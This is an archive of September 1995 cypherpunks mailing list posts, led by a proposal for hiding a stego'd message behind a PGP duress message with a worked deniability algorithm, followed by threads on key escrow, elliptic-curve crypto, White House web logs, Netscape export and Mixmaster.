% stealth < msg.pgp > msg.stl
% cat msg.stl >> duress.pgp
% pgp +makerandom=1234 noise
% cat noise >> duress.pgp
% pgp -a duress.pgp
% mail someone < duress.asc

The pgp +makerandom=<size> <file> is an undocumented feature of pgp >
2.6 (not sure exactly when it got added, Colin Plumb pointed it out
when I asked him about ran nos for stealth).

So what this means is that you are using PGP it's self to hide a
stegoed message.  This would be good for the guy from FACTnet
(forgotten his name) who just got hit by the CoS, he could hold out
for a while, then give up his key, the duress message would appear,
and the real message would be explained by having a script to do this
on his HD, and having long since burned the disk with a script to do
the above on it:

% pgp -es msg
% pgp +makerandom=4567 noise
% cat noise >> msg.pgp
% pgp -a msg.pgp
% mail someone < msg.asc

ie the idea is that you pad your message to a fixed size for the
express purpose of hampering traffic analysis (of the type of my,
Alice did have a lot to say to Bob that day).  It would be even better
cover if the thing had gotten sent through a remailer, as this kind of
thing is expected of type I remailer traffic (before mixmaster which
does the packetizing for you).

So the duress message really looks like this:

+---------+---------------------------+--------------------+--------+
| pgp hdr | IDEA encrypted duress msg | stealthed real msg | noise  |
+---------+---------------------------+--------------------+--------+

the IDEA block has a length field, but you can increase the length
without damage to include the following stealthed stuff as the
underlying stuff which is IDEA encrypted will know it's length on
decryption, and the following junk will just be discarded.

So, Alice and her secret key ring (encrypted) gets nabbed by the
Charlie (CoS?), and coerced into divuling her passphrase.

And if and when it is noticed that the message was longer than it
ought to be (CoS that smart? substitute the NSA and they'd notice for
sure), Alice explains away the junk on the end by pointing them to the
fact that all of her messages where exactly (say) 16k long, and that
she was using a the noise only script, and that the message really is
this:

+---------+---------------------------+-----------------------------+
| pgp hdr | IDEA encrypted duress msg | noise                       |
+---------+---------------------------+-----------------------------+

Now we come to arguments about why you might want this built-in to
PGP.  Well it provides plausible deniablity as you have no extra
software which might look incriminating unless you managed to dispose
of it first, if it comes as stock.

Also the 2nd reason for built-in at least for stealth is if it needs
good random number source, but as I said, I'm not sure it needs a
random no generator.  So comments please, this has been around a few
times already, but here's the algorithm for manipulating x which is
the RSA encrypted component of the header of an RSA+IDEA encrytped PGP
message:

(this is a description of my implementation of Hal's algorithm as
described on his www page: http://www.portal.com/~hfinney/):

consider random no x, RSA modulus N

	1 < x < N

(that used to say 0 <= x < N, but 0, and 1 being RSA fixed points, 0,
1, and N won't be generated by PGP presumably?  I think this shouldn't
matter as the keyspace of N is so large that the probability of a 0 or
a 1 specifically is nothing to worry about I think.)

Hal's algorithm was to convert x to being in the range:

	0 <= x' < lim

where lim which is the next power of 2 above N * 2^surety, and surety
is 64, 64 seems big enough?

The recover operation is:

	x = x' mod N

and the create operation is:

1) scale = int( (lim-1) / N ) + 1

2) scale2 = 2^int( log2( scale ) + 1) 

	ie scale2 = next power of two over scale

3) r = MD5( 0, x ) 

	ie MD5 digest of x, as x is an RSA encrypted random session
	key misc other info, and more random padding to bring up to
	be close to N in size.  It strikes me that we already have 
	a random number, and that provided MD5 can not be inverted
	(which it is not possible, as it is compressing, and looses
	info, and the brute force to find which of all the possible
	y's (0 < y < N) MD5 digests come out to be x.

	I would have thought it likely that this would be evenly
	distributed, and that the cost would be enormous?

4) r = MD5( r, rand() )

	it will fail some of the time, so in this
	case repeat with another random number, Istirred it in first
	but perhaps you would only do it if it failed.  Or perhaps it
	is enough to MD5( r, r ) ie stir r into itself to generate
	another ran no?  So long as there are no rare cycles?
	Presumably either impossible or infinitessimally small
	probability.


5) r = r mod scale2
	
6) if (r > scale) goto 4)

	4),5) & 6) are designed to generate an evenly distributed
	random number in the range:

		0 <= r <= scale

7) x' = N * r + x

8) if (x' > lim) goto 4)



an example, with small numbers, and surety set to 8, x = 7, and
manufactoring the ran nos manually:

lim = 2^( int( log2(N) + 1 ) + surety )
    = 2^( 4 + 8 ) = 4096

1) scale = int( 4096 / 13 ) + 1 = 316

2) scale2 = 2^( int( log2( scale ) ) +1 ) = 2^(8 + 1) = 512
          
3) say MD5( x ) = 0x00000000000000000000000000001234

4) say MD5( x, rand ) = 0x00000000000000000000000000001235 = 4661 (base 10)

5) r = 4661 mod scale2 = 4661 % 512 = 53

6) if ( 53 > 315 ) - it's not

7) x' = N * r + x = 13 * 53 + 7 = 696

8) if (696 > 4096) - it's not)

so x' = 696

reversing:

x = x' mod N = 696 mod 13 = 7


when 6) is true, ie r > scale which will happen half the time on avg
with the first ran no, and so on like a coin flip, the chances of many
coins flipping the wrong way diminishes rapidly with number of flips.

when 8) is true, ie x' > lim, x' can only be > than lim when x = N - 1, 
and given that x = N - 1, the probability is less of x being in 

	N * scale <= x < lim

but this will only occur with probability:

       1         1
    -------- < -----
    2^surety   scale

I think.  So you'd have to collect one mess of messages to even catch
one sample, let alone enough messages to have a statistical proof of
steganography being present.


Pls check the maths a bit, the above describes the software
implementation of Hal's algorithm which he has on-line, on his page:

	http://www.portal.com/~hfinney/

But the main question I'd like to get verification on is if it is safe
to use the MD5 of the RSA encrypted message to perform the operation.

I'm essentially doing:

	x' = N * f(MD5(x)) + x

where f(y) is a function which converts from range 0 <= y < 2^128 to a
range 0 <= f(y) < scale.

Is that safe?

x is random, and will be different even for a repeat encryption of the
same file, as PGP is using a random IDEA session key.

So are there any brute force attacks on that which would be cheaper
than attacking 128 bit IDEA?  PGP's random number generator also makes
extensive use of MD5, so I'm taking the use of MD5 as secure as a
given.

If it is thought to be dangerous for some reason (it is after all some
kind of signature on it's self, presume that you know N, and x' but
not x, the question is can the equation be brute force reversed in a
less than 128 bit brute force attack.  I'm neglecting to consider the
rand() calls, which I'm not expecting to add security, but are just a
mechanism to stir the value with to get more random nos, as
occasionally the alogrithm needs more than one, if the first fails,
etc.

If people reckon it's insecure, then it would be ideal to include the
stealth functionality into PGP, so that integral use of PGPs ran no
routines can be made.  I was previously using an MD5 digest of PGPs
randseed.bin for this, but you can't stir it (well you could but that
would considered a security risk diddling with PGPs files), and not
stirring means you have no improvement over the above, in the event
that that your system is captured with the known plaintext.  If you
stirred it there would be no proof of that being the message in the
file.  Even unstirred, if the N * f(MD5(x)) + x is no good, the
inclusion of a digest of the randseed.bin would be a big improvement.

It seems rather messy to have all of the keyboard sampling stuff, for
PGP keys duplicated for this.  Hope the x' = N * f(MD5(x)) + x
construct is secure as this will avoid the issue.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 12 Sep 95 11:00:12 PDT
To: gjeffers@socketis.net
Subject: PGP duress code, and stego (was Re: PGP in UK - snooped unSTEALHed?)
Message-ID: <26623.9509121759@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



erm darn, I posted a huge post which should have the above subject,
but instead came out with the subject line:

Re: Returned mail: User unknown

due to typo, could someone replying please correct that, if following
up, I won't bother posting it again in respect of those who actually
pay for their mail feed per k.

It had a lot of questions which I'd really like people to look at,
skip back a few, and take a read, it's for the implementation of
stealth2, Henry Hasturs stealth util.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Tue, 12 Sep 95 10:02:58 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
Message-ID: <v01510100ac7a4e673a66@[193.74.217.13]>
MIME-Version: 1.0
Content-Type: text/plain


>intercepts requested and authorized in the past year.  As I recall, the
>number was quite small - around 12K [?].  Someone had found this out
>through an FOIA request, perhaps, (my recollection of it is poor). It was

I think it's about 1200.

>not a large number, anyway.  I must conclude that the actual number of
>intercepts is much, much larger than they are saying, and that they must
>be getting what they perceive to be good intel from all this snooping.
>

A more cautious conclusion would be would be that the importance (to the
LEA's) of the busts made with crypto is much larger than the numbers
suggest.  You could interpret that a lot of ways:  I suspect that
high-profile career-enhancing cases are highly dependent on wiretaps.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Tue, 12 Sep 95 09:17:52 PDT
To: danisch@ira.uka.de
Subject: Re: Elliptic Curve Public Key Crypto available
In-Reply-To: <9509121500.AA03172@elysion.iaks.ira.uka.de>
Message-ID: <199509121617.TAA06025@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> Available anywhere outside the escrowed country ?

See http://www.cs.hut.fi/crypto/software.html#eliptic

It was in Italy (ftp.dsi.unimi.it) earlier today...

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 12 Sep 95 16:19:43 PDT
To: cypherpunks@toad.com
Subject: new info-sec mailing list
Message-ID: <9509122318.AA13685@all.net>
MIME-Version: 1.0
Content-Type: text


	Info-sec heaven is introducing a new mailing list.  Unlike many
of the Internet's mailing lists, this is not an open forum for people on
the Internet to exchange ideas.  Rather, it is a monthly mailing used to
inform readers of new information that can be found in info-sec heaven. 

	If you would like to be informed of new information, services,
search capabilities, protection software, articles, books, and other
information that appears in info-sec heaven without having to come in
periodically and look for yourself, please let us know by sending email
to fc@all.net and we will add you to our monthly list. 

	Thank you for your time.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 12 Sep 95 16:23:36 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509121717.AA03226@anon.penet.fi>
Message-ID: <9509122322.AA22126@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hang on a sec, what is meant to be the conspiracy?

I don't see any relationship to cryptography here. The material in question was 
published very publicaly. If you make a public statement about a person then 
they have a right to hear it. I see that the message on log file confidentiality 
is not getting through though.


I happen to know that the US government is very interested in hearing the views 
of its citizens, and also the views of citizens of other countries. They are 
interested in particular about views relating to the actions of the US 
government, what the government is doing and what it could do. "anti-president 
views" are of great importance if it is known why those views are held.

In my country we call that listening. I have just spent a couple of days talking 
with a group of people looking at how we can do that better. There is a 
considerable barrier to being involved in the political process, perhaps the Web 
can reduce that barrier. The problem being how to handle the massive amounts of 
input.


>    Readers may be tempted to post a threat to the President on a
>newsgroup just to see if they get a visit from the Secret Service
>the next day. That experiment is not advisable. It is a  criminal
>offense.  

DO NOT DO THIS.

The secret service is required by law to investigate every single threat. This 
costs a very considerable amount of money which comes from your taxes. There is 
no discresion in the matter. Hence the only method of reducing the number of 
alarms is to arrest people and make an example of them. Unless you want to be 
the example do not do this.


>have  been  visited  by  White  House   computers   ist1.eop.gov,
>ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
>28 and August 31, and a total of 128 files have been  transferred

I don't know which those machines are, however there are a large number of Web 
browsers in the Whitehouse and there are a large number of staffers. There is 
also a Web browser outside the oval office for visitors to use while they are 
waiting. If you make it your buisness to print nasty material about people then 
don't be suprized if they read it. The material has probably been picked up by a 
search engine in any case.


There is no conspiracy here unless you are very determined to find one. Given 
the nature of the article it does not appear that a balanced view of the 
administration was being sought in any case. I happen to know that Newt 
Gingrich's staffers and Weld's staffers also surf the Web, are they "monitoring 
anti-Newt dissidents?", I suspect not. I don't get the impression that our 
anonymous source has sent a complaint in that direction. I spend a considerable 
amount of time getting people in power to listen to the net community. I get 
very pissed off when a bunch of conspiracy nuts try to make out that they have 
been doing anything wrong when they do.


As a matter of ethics I consider information in log files private. This was 
certainly considered to be the case in the Marty Rimm affair. The posting was 
clearly designed to intimidate the Whitehouse staffers into not visiting those 
sites, it was possible that they might have lost their net.access entirely as a 
result of the complaint. I consider the letter sent to Terzano to be unethical 
since the staffers had a right to expect their privacy to be preserved.


If people want to talk about cryptography and the President we can discuss 
whether he should put a digital signature on his press releases.


I think the use of the word dissident in the message is an insult, both to the 
dissidents in the Eastern Europe and other places who have suffered genuine 
persecution and to the democratic institutions and people of the United States.


		Phill Hallam-Baker

Not speaking for anyone else.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rosing <cryptech@Mars.mcs.com>
Date: Tue, 12 Sep 95 17:34:40 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Elliptic Curve Public Key Crypto available
In-Reply-To: <9509121658.AA00550@ch1d157nwk>
Message-ID: <Pine.3.89.9509121934.A15499-0100000@Mars.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 12 Sep 1995, Andrew Loewenstern wrote:

> What about NeXT's Fast Elliptic Encryption (FEE)?  Their research guy,  
> Richard Crandall, came up with major speedups to elliptic curve encryption.   
> In fact, there was a simple cryptosystem that shipped as a demo with NeXTSTEP  
> 2.0.  What was most interesting about this system was that it didn't store  
> any keys anywhere;  your public/private key pair was generated _on the fly_  
> from your passphrase every time you encrypted or decrypted....on a 25mhz  
> 68040 too...   and it was fast!  It wasn't that great of an implementation  
> (you _really_ need a lot of bits of entropy in that passphrase, and you can't  
> change your passphrase without changing your PK), but it shows how fast  
> NeXT's speedups are.  And this was in 1990...
> 
> I'm not sure if the speedups are patented, but you could try a literature  
> search.  If it really is fast then it could mean good things for servers that  
> need to do a lot of enrcyption/decrption for interaction with clients.

Yes, the speedups are patented.  Their system relied on very specific 
curves with very specific properties.  I purposly avoided coding up their 
method because of that.  Their method is described in patent #5,159,632 
dated Oct 27, 1992 and it uses a different equation (supersingular 
version) than what I implemented.  The price is slower speed, but with 
100 MHz processors you won't notice.

Patience, persistence, truth,
Dr. mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Sep 95 17:32:40 PDT
To: A5113643667@attpls.net (Tom Jones)
Subject: No Subject
In-Reply-To: <D71D5F23>
Message-ID: <199509130032.UAA16308@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Jones writes:
> The ones I've heard about are SKIP, Photurus and ISAKMP(sp?).

ISAKMP is really a metaprotocol, and SKIP doesn't fit the IPSP model
well -- it never was much of a candidate...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Tue, 12 Sep 95 18:41:32 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: GAK
In-Reply-To: <199509121457.KAA28748@panix.com>
Message-ID: <Pine.SOL.3.91.950912202830.20805B-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


What's technology got to do with it, in principle?  If
I write a letter in code, do I have to send the FBI the
key, just in case?

I don't see anything complicated about this--Director
Freeh wants more wiretapping ability than he's got now,
and I have no doubt that that expansion of FBI power
would be good for national security and law enforcement.

So would an FBI camcorder in every room of every house.
The question is where to draw the line, and I'd rather
let the lines draw themselves, as opposed to having 
citizens be compelled to draw them.  The telephone
system, Mr. Freeh's preferred analog, is inherently
susceptible to tapping, but what if it were not, and
every telephone were required to be equipped with
a government tap switch, subuect to warrant, of course?

I don't think I'd like that.  Would you?

MacN

On Tue, 12 Sep 1995, Duncan Frissell wrote:

> At 09:25 PM 9/3/95 -0400, Brian Davis wrote:
> 
> >I, of course, know of the "dislike" of GAK here.  I am curious to know, 
> >however, if the "dislike" is because government would have access under 
> >any circumstances or if the primary worry is that government will cheat 
> >and get access when most would agree that they shouldn't (either by the 
> >judge "cheating" or a TLA stealing it).
> 
> 
> If we can deploy technologies to protect our freedom to communicate the way
> *we* choose to, then we have the right to do so.  Beyond rights, we have the
> power to do so --- which is worth even more.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anon-remailer@utopia.hacktic.nl)
Date: Wed, 20 Sep 95 17:27:34 PDT
To: cypherpunks@toad.com
Subject: RE: NETSCAPE TO PATCH SHAREWARE VERSION
Message-ID: <9509201550426518@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 12 Sep 1995 23:00:18 +0200
To: cypherpunks@toad.com
Subject: Re: Netscape to patch shareware version
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Organization: Hack-Tic International, Inc.

>| Netscape said it received word last week that the State Department had 
>| cleared that version for release on the Net, but only within the U.S., 
>| owing to current export laws banning the export of encryption schemes 
>| stronger than 40 bits.  THe company could provide no details by press 
>| time on how it would ensure that the 128-bit version wouldn't leak beyond 
>| U.S. borders.
>
>Ok, any bet on how long it will take?

It's already been exported.  Evidently, one of those who bought the commercial 

I note the site removed it, however, probably because Netscape Comm. Inc. reque






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rosing <cryptech@Mars.mcs.com>
Date: Tue, 12 Sep 95 19:19:34 PDT
To: cypherpunks@toad.com
Subject: generating hash.curve in eliptic.src
Message-ID: <Pine.3.89.9509122121.A19360-0100000@Mars.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


Among other comments, it was pointed out that I had not included 
"hash.curve".  To generate this file I did the following

main()
{
	POINT	point;
	CURVE	curve;

	init_opt_math();
	init_rand();
	rand_curv_pnt(point,curve);
	save_curve("hash.curve",curve,point);
	close_rand();
}

This was done during development and I forgot about it.  A simpler patch 
is to fix an error finding the file with a call to rand_curv_pnt to 
generate it.

Kind of interesting that way for hashing your secret key.  If everyone 
uses a different curve to generate their secret key, access to the 
machine is necessary to even begin to think about cracking any pass phrase.
Don't know if actually adds any security, but it is an interesting concept.

As for why I didn't put up a tar file, no particular reason.  It's source 
for a particular machine (MachTen on a Mac) and I figured every C 
compiler is different so some hacking will be required by anyone interested.
Once more bugs are fixed such as the one above, I'll put it up in a more
easily compilable form.

And thanks for the comments so far.  I'll do my best to keep up with them.

Patience, persistence, truth,
Dr. mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Sep 95 18:49:18 PDT
To: lindat@iquest.net (Linda Thompson, American Justice Federation)
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <m0ssbX5-00062kC@dorite1.iquest.net>
Message-ID: <199509130148.VAA16414@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Linda Thompson, American Justice Federation writes:
> During the Waco Hearings, Charles Schumer said he'd seen Foster's
> missing file and all it had in it was a memorandum about "Linda
> Thompson and THAT tape."

My, aren't the paranoid nutcases getting self important.

Please do not pollute cypherpunks with this crap.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Tue, 12 Sep 95 20:17:24 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Digital Fingerprinting
In-Reply-To: <Pine.D-G.3.91.950912175508.23949D-100000@dg.thepoint.net>
Message-ID: <Pine.SOL.3.91.950912221558.20805N-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Then, in W.Ky., as in Stockbridge, "You can get
anything you want..."? :)

MacN

On Tue, 12 Sep 1995, Brian Davis wrote:

> On Tue, 12 Sep 1995, Peter Trei wrote:
> 
> > > Finding the mail mixed in there is evidence that supports the "charge" 
> > > but surely can be rebutted.  When I was practicing in a small town c. 
> > > 1984, people would be summoned (sent a paper telling them to show up) to 
> > > court for illegal dumping if their mail was found with other trash, old 
> > > refrigerators, etc., in a creek somewhere.  Those charged could always 
> > > put on proof that Billy Bob's garbage service picked up their trash ...
> > 
> > > The sentence was almost always to go and pick up some multiple of the 
> > > garbage found and take it to the landfill.
> > 
> > This was Stockbridge, in MA, right :-?
> 
> No, it was in Western Kentucky with a week or two of a family's garbage 
> and maybe a worn out appliance or two.  No garbage pickup provided by the 
> county; private haulers expensive; dropping much at the landfill both 
> inconvenient and "unnecessary" given the availability of hard to find 
> valleys and creeks.
> 
> EBD
> 
>  
> > 	        That's what we did, and drove back to the church, had a
> > 	thanksgiving dinner that couldn't be beat, went to sleep and didn't
> > 	get up until the next morning, when we got a phone call from officer
> > 	Obie.  Said "Kid, we found your name on an envelope at the bottom of a
> > 	half a ton of garbage, and just wanted to know if you had any
> > 	information bout it". I said "Yes Sir Officer Obie, I cannot tell a
> > 	lie, I put that envelope under that garbage."
> > (c) Arlo Guthrie
> > 
> > 
> >  
> > 
> > Peter Trei
> > Senior Software Engineer
> > Purveyor Development Team                                
> > Process Software Corporation
> > http://www.process.com
> > trei@process.com
> > 
> 
> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame way! I get treated worse in person every day!!
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 12 Sep 95 19:27:57 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <Pine.D-G.3.91.950912180024.23949E-100000@dg.thepoint.net>
Message-ID: <9509130226.AA22319@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Ooops.  Dog bites man.
>And do you really think the White House couldn't hire a couple of net 
>gurus to sniff packets if they wanted to hide their "monitoring"(=reading).

Yes, they are far too cheap to hire, they would go off somewhere and smochze the 
info outa folks.

If they ever want an anonymous proxy server they are wellcome to use ours.

Seriously folks I'm very pissed about the abuse of log file information. The 
Whitehouse restrict browsing privilleges to a chosen few. The attempt to make a 
big deal out of it could have cost someone their job (it didn't in this case).

If we are serious about privacy I think we should be very clear that we respect 
the privacy of Whitehouse staffer and staffers in the Senate and House. I'm not 
being partisan about this, I have put a lot of effort into getting participation 
from the right as well as the left. I've just not been very successful in that 
area.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 12 Sep 95 19:56:29 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <9509130255.AA03446@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Seriously folks I'm very pissed about the abuse of log file information. The 

What abuse?  Is there an expectation of privacy in Web-world,
such that all users can honestly expect that a site is compelled
to keep its "visitor log" private?

Surely not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 12 Sep 95 14:00:35 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape to patch shareware version
Message-ID: <199509122100.XAA13066@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>| Netscape said it received word last week that the State Department had 
>| cleared that version for release on the Net, but only within the U.S., 
>| owing to current export laws banning the export of encryption schemes 
>| stronger than 40 bits.  THe company could provide no details by press 
>| time on how it would ensure that the 128-bit version wouldn't leak beyond 
>| U.S. borders.
>
>Ok, any bet on how long it will take?

It's already been exported.  Evidently, one of those who bought the commercial version sent it to Europe as soon as it was out.

I note the site removed it, however, probably because Netscape Comm. Inc. requested that they do so.  Netscape generally objects to anyone else carrying their browser (.edu sites with prior permission excepted).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 20:33:54 PDT
To: Mac Norton <mnorton@cavern.uark.edu>
Subject: Re: Digital Fingerprinting
In-Reply-To: <Pine.SOL.3.91.950912221558.20805N-100000@cavern>
Message-ID: <Pine.D-G.3.91.950912233806.4405B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Mac Norton wrote:

> Then, in W.Ky., as in Stockbridge, "You can get
> anything you want..."? :)

I'd stick with:
***********************************************
You can't always get what you want            1
but if you try
sometimes, sometimes you get what you need.   2
***********************************************

1 ability to dump garbage where you want
2 a better appreciation for the environment
:-)
EBD
 
> MacN
> 
> On Tue, 12 Sep 1995, Brian Davis wrote:
> 
> > On Tue, 12 Sep 1995, Peter Trei wrote:
> > 
> > > > Finding the mail mixed in there is evidence that supports the "charge" 
> > > > but surely can be rebutted.  When I was practicing in a small town c. 
> > > > 1984, people would be summoned (sent a paper telling them to show up) to 
> > > > court for illegal dumping if their mail was found with other trash, old 
> > > > refrigerators, etc., in a creek somewhere.  Those charged could always 
> > > > put on proof that Billy Bob's garbage service picked up their trash ...
> > > 
> > > > The sentence was almost always to go and pick up some multiple of the 
> > > > garbage found and take it to the landfill.
> > > 
> > > This was Stockbridge, in MA, right :-?
> > 
> > No, it was in Western Kentucky with a week or two of a family's garbage 
> > and maybe a worn out appliance or two.  No garbage pickup provided by the 
> > county; private haulers expensive; dropping much at the landfill both 
> > inconvenient and "unnecessary" given the availability of hard to find 
> > valleys and creeks.
> > 
> > EBD
> > 
> >  
> > > 	        That's what we did, and drove back to the church, had a
> > > 	thanksgiving dinner that couldn't be beat, went to sleep and didn't
> > > 	get up until the next morning, when we got a phone call from officer
> > > 	Obie.  Said "Kid, we found your name on an envelope at the bottom of a
> > > 	half a ton of garbage, and just wanted to know if you had any
> > > 	information bout it". I said "Yes Sir Officer Obie, I cannot tell a
> > > 	lie, I put that envelope under that garbage."
> > > (c) Arlo Guthrie
> > > 
> > > 
> > >  
> > > 
> > > Peter Trei
> > > Senior Software Engineer
> > > Purveyor Development Team                                
> > > Process Software Corporation
> > > http://www.process.com
> > > trei@process.com
> > > 
> > 
> > Not a lawyer on the Net, although I play one in real life.
> > **********************************************************
> > Flame way! I get treated worse in person every day!!
> > 
> > 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 20:52:45 PDT
To: Jim Gillogly <jim@acm.org>
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <199509122307.QAA02486@mycroft.rand.org>
Message-ID: <Pine.D-G.3.91.950912234153.4405C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Jim Gillogly wrote:

> 
> > Brian Davis <bdavis@thepoint.net> writes:
> > No question.  Many high profile public corruption, Mafia, and high-level...
> > ...In our district, we managed to convict almost 20 people...
> > Particularly effective were the court-approved video and audio tapes of...
> 
> > I don't doubt that wiretaps may sometimes be abused despite the 
> > incredibly onerous review process, but they have positive aspects, too.
> 
> In how many of these cases did you fail to get the necessary information
> because of encryption?  Has this proportion been changing over the years?

I wasn't personally involved in any of the cases, but I susupect the 
answer re encryption is zero.  There was the time the FBI agent failed to 
push the record button, however.

My response was to the wiretap correlation to career-making cases.  I 
don't believe encryption is widespread enough yet to be a serious problem 
in the Title III area.  It is a potential problem, though, as encryption 
(rightfully) spreads.  The question I am debating with myself, with all 
of your help, is what the policy "ought to be."

Even if I ultimately come down in my own mind on the Cypherpunks side of 
the line, understand that, as far as policy goes (and, hell, everything 
else for that matter), I'm a nobody.  But I try to make up my own mind 
about what is right.

EBD


> > 	Jim Gillogly
> 	Hevensday, 21 Halimath S.R. 1995, 23:06
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 12 Sep 95 23:41:09 PDT
To: mix-l@jpunix.com
Subject: Mixmaster posting poll
Message-ID: <ac7c2d6a01021004664d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am about to release Mixmaster 2.0.2

This version will not contain the Socket code, but will have a bunch
of bug fixes. One of the things I am modifying is the posting to news
feature.

Mixmaster supports posting through either a local inews program, or
through a mail-to-news gateway.

There seem to be two flavors of the  latter:
        group.name@gateway.com
and
        mail2news@gateway.com
        Newsgroups: group.name

I really only want to support one of these standards. Which is more standard?
Is there a trend towards one becoming the dominant standard?

The next version should be out within 48 hours.

        -Lance
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFZ+PvPzr81BVjMVAQEa2Qf/d9a3UTzan5gLB/GN/n+DaMSvDLRVJ96V
JpH4F+5SO+UQgdxoSAup9+/l+Q11A4O1ZjxpELVEh6e/7U8HjzrGQHCXGIMfzxkt
DufouYDViio8cQ7w1Y4OLqlqaD10OUJ5Chrzm013mc7PzFBgF5eb6rf8S4TdGEYg
Ly92xWgYHHk8EwhviYxqdBAGnSSTykEkY9E5WHLca+Lt+5ejox1uMEirq6I4rRVZ
UBhfiVQhRsD2eKRUx/a3D3eVnuj0jS8+4i3ibcpUDxm+8WY76zGzmz67y66MzaDo
0E0fFK1VeCwrBoNqFJSLYY5e17c7T6hI3mWJYaZFOLL7H3rGsYUcHw==
=BdWR
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 20:47:39 PDT
To: Anonymous Remailing Service <nobody@armadillo.com>
Subject: Re: your mail
In-Reply-To: <199509122323.SAA23651@monad.armadillo.com>
Message-ID: <Pine.D-G.3.91.950912234803.4405E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Anonymous Remailing Service wrote:

> E. Brian sed:
> 
> 
> >Unbelievable!!!  To add to this distressing truth, I have learned that 
> >the White House also subscribes to a number of newspapers and periodicals 
> >which are reviewed for things of interest to the Administration and to 
> >the President. I I I I I I ammmmmmmmmm shocked!
> 
> mebbe tha Slickster just wants to know who orlin's "Deep Throat" is...
> Keep checkin' them fingerprints, Willie!

